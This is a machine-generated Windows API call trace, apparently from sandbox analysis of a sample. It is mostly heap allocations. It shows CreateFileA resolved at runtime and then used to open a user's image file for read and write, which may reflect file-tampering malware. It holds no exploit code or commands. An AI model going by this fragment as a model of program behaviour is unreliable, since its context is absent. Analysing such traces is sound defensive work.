[0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.919] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd990 [0190.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd990, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0190.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.919] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0190.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0190.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd990, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.920] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0190.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0190.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x48) returned 0x9aa548 [0190.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", cchWideChar=72, lpMultiByteStr=0x9aa548, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", lpUsedDefaultChar=0x0) returned 72 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.921] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\ufxfgc_lqhg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0190.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=72, lpWideCharStr=0x8ee038, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png") returned 72 [0190.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0190.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0190.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.924] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0190.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.926] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.926] RtlAllocateHeap 